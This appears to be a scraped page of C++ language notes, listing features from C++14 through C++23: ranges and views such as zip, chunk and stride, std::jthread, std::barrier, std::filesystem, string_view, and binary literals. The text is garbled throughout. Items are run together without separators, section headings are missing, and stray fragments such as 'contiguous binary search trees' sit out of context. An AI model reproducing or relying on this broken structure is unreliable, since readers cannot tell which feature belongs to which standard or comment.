(contiguous binary search trees)import <iostream>;
– modulesranges_to<>
– convert a range to a vector (for
instance)join/join_with
– I’ve had no luck with these outside of
a trivial exampleA lot of effort has gone into ranges and views C++23.
starts_with
shift_left
ranges::to
– not supported in gcc 13.2find_if
contains
contains_subrange
zip
adjacent
pairwise
chunk
slide
chunk_by
stride
– take every nth elementrepeat
iota
– infinite views may be more performant as no
boundary check.contains
for maps.starts_with
for stringsstd::jthread
– thread you don’t have to explicitly join
(it’s the same as std::thread
but joins in the destructor),
also has a built-in stop tokenstd::barrier
for thread synchronisation (like
std::latch
but reusable)std::filesystem
– from Booststd::string_view
std::clamp
[[maybe_unused]]
<string_view>
std::byte
Also see cppreference.
C++14 is an extension and improvement of C++11.
0b1111000
auto
return typeauto
in lambda
parameterstemplate <class T> constexpr T bins = T{24'576};
decltype(auto)
constexpr
Less common but another set of principles to consider.